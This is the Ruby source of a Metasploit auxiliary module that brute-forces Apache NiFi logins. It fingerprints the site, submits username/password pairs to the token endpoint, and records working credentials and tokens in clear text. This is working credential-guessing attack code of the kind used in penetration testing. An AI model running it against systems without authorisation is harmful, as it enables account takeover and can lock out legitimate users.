Path: blob/master/modules/auxiliary/scanner/http/apache_nifi_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary login scanner for Apache NiFi.
#
# For each target the module fingerprints the NiFi login page, asks the
# nifi-api/access/config endpoint whether username/password login is enabled,
# and then submits every candidate pair yielded by each_user_pass to
# nifi-api/access/token. Pairs answered with HTTP 201 are reported as valid.
#
# Notes for anyone running or reviewing this module:
# - Every candidate is a separate POST to nifi-api/access/token and the
#   metadata declares IOC_IN_LOGS, so the attempts are expected to be visible
#   in target-side logs.
# - NOTE(review): only IOC_IN_LOGS is declared under SideEffects. If the NiFi
#   instance delegates authentication to a directory with a lockout policy,
#   repeated failures may lock accounts -- confirm whether ACCOUNT_LOCKOUTS
#   should be listed as well.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report

  # Registers the module metadata and its options.
  #
  # Defaults set here: RPORT 8443, TARGETURI '/', and the advanced SSL option
  # enabled. The description states that SSL and RPORT have to be changed by
  # hand for NiFi <= 1.13.0.
  #
  # @param info [Hash] metadata passed in by the framework and merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache NiFi Login Scanner',
        'Description' => %q{
          This module attempts to take login details for Apache NiFi websites
          and identify if they are valid or not.

          Tested against NiFi major releases 1.14.0 - 1.21.0, and 1.13.0
          Also works against NiFi <= 1.13.0, but the module needs to be adjusted:
          set SSL false
          set rport 8080
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      Opt::RPORT(8443),
      OptString.new('TARGETURI', [true, 'The URI of the Apache NiFi Application', '/'])
    ])

    register_advanced_options([OptBool.new('SSL', [true, 'Negotiate SSL connection', true])])
  end

  # Records a working username/password pair, and the login that proved it,
  # in the current workspace.
  #
  # @param opts [Hash] expects the keys :ip, :port, :service_name, :user,
  #   :password and :proof
  # @return whatever create_credential_login returns
  def report_cred(opts)
    # Fields that identify the service; shared by the credential and the login record.
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    # The password is stored as given (private_type :password), so the
    # workspace database holds it in clear text.
    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password,
      **service_data
    }
    core = create_credential(credential_data)

    login_data = {
      core: core,
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      last_attempted_at: DateTime.now,
      proof: opts[:proof],
      **service_data
    }

    create_credential_login(login_data)
  end

  # Scans a single host: fingerprint, capability check, then the login attempts.
  #
  # The run is aborted through fail_with when a request gets no response, when
  # either GET is not answered with 200, when the NiFi script reference is
  # missing from the login page, or when the token endpoint answers 409.
  #
  # @param ip [String] address of the host being scanned (used in messages only)
  def run_host(ip)
    vprint_status("Checking #{ip}")

    # Step 1: the login page has to load and reference NiFi's nf-namespace.js.
    landing = send_request_cgi!('uri' => normalize_uri(target_uri.path, 'nifi', 'login'))
    if landing.nil?
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response")
    end
    if landing.code != 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{landing.code})")
    end

    nifi_marker = %r{js/nf/nf-namespace\.js\?([\d.]*)">}
    unless nifi_marker.match?(landing.body)
      fail_with(Failure::NotVulnerable, "Apache NiFi not detected on #{ip}")
    end

    # Step 2: ask the API whether username/password login is enabled at all.
    access_config = send_request_cgi!('uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'config'))
    if access_config.nil?
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response")
    end
    if access_config.code != 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{access_config.code})")
    end

    login_supported = access_config.get_json_document.dig('config', 'supportsLogin')
    unless login_supported
      print_error("#{peer} - User login not supported, try visiting /nifi to gain access")
      return
    end

    # Step 3: one POST to the token endpoint per candidate pair.
    each_user_pass do |user, pass|
      attempt = send_request_cgi!(
        'uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'token'),
        'method' => 'POST',
        'vars_post' => { 'username' => user, 'password' => pass }
      )
      if attempt.nil?
        fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response")
      end

      case attempt.code
      when 201
        # The password is printed in clear text and will appear in any saved console output.
        print_good("#{peer} - Apache NiFi - Login successful as '#{user}' with password '#{pass}'")
        # NOTE(review): the whole 201 body is stored as proof. For a token
        # endpoint that body is presumably the issued access token -- confirm,
        # and if so treat the workspace data as holding a live session secret.
        report_cred(
          ip: rhost,
          port: rport,
          service_name: (ssl ? 'https' : 'http'),
          user: user,
          password: pass,
          proof: attempt.body.to_s
        )
      when 409
        # The module reads 409 as "logins are refused over plain HTTP" and stops.
        fail_with(Failure::BadConfig, "#{peer} - Logins only accepted on HTTPS")
      else
        vprint_error("#{peer} - Apache NiFi - Failed to login as '#{user}' with password '#{pass}'")
      end
    end
  end
end